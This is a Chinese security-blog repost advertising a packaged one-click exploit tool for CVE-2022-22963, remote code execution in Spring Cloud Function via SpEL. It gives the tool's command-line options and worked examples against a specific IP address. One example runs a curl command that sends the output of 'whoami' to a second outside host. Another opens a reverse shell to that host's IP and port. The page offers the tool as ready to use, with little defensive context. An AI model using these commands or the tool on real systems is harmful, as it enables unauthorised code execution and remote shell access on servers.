CVE-2022-22963 (spring cloud function sple rce)一键利用工具

admin 2023年3月13日08:06:27评论70 views字数 1073阅读3分34秒阅读模式

CVE-2022-22963 (spring cloud function sple rce)-spring cloud function 一键利用工具! by charis-博客http://www.charis3306.top/

已打包为exe文件开箱即用

命令主题

usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]
spring cloud function 一键利用工具! by charis 博客http://www.charis3306.top/
options: -h, --help show this help message and exit --check CHECK 检测方式post或get方式,--check get --check post --route ROUTE 检测路由,默认是functionRouter --url URL 输入利用的url --ip IP 反弹shell地址ip --port PORT 反弹shell地址端口 --proxies PROXIES 启用代理 --cmd CMD 要执行的命令

--check 是必选项

所用帮助主题

.Spring-cloud-function-spel0.2.exe --help

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

默认检测--check 是必须选,--route是漏洞存在的路由。注意如果不借助dnslog 或sleep 进行探测会存有误报!

.Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

执行命令验证是否能利用

.Spring-cloud-function-spel0.2.exe --check post --url http://154.83.15.150:8080/ --cmd "curl http://154.211.12.40:9999/`whoami`"

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

反弹shell

.Spring-cloud-function-spel0.2.exe --check post --url http://154.83.15.150:8080/ --ip 154.211.12.40 --port 9999

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

项目地址:https://github.com/charis3306/CVE-2022-22963

原文始发于微信公众号(Ots安全):CVE-2022-22963 (spring cloud function sple rce)一键利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月13日08:06:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-22963 (spring cloud function sple rce)一键利用工具https://cn-sec.com/archives/1600168.html

发表评论

匿名网友 填写信息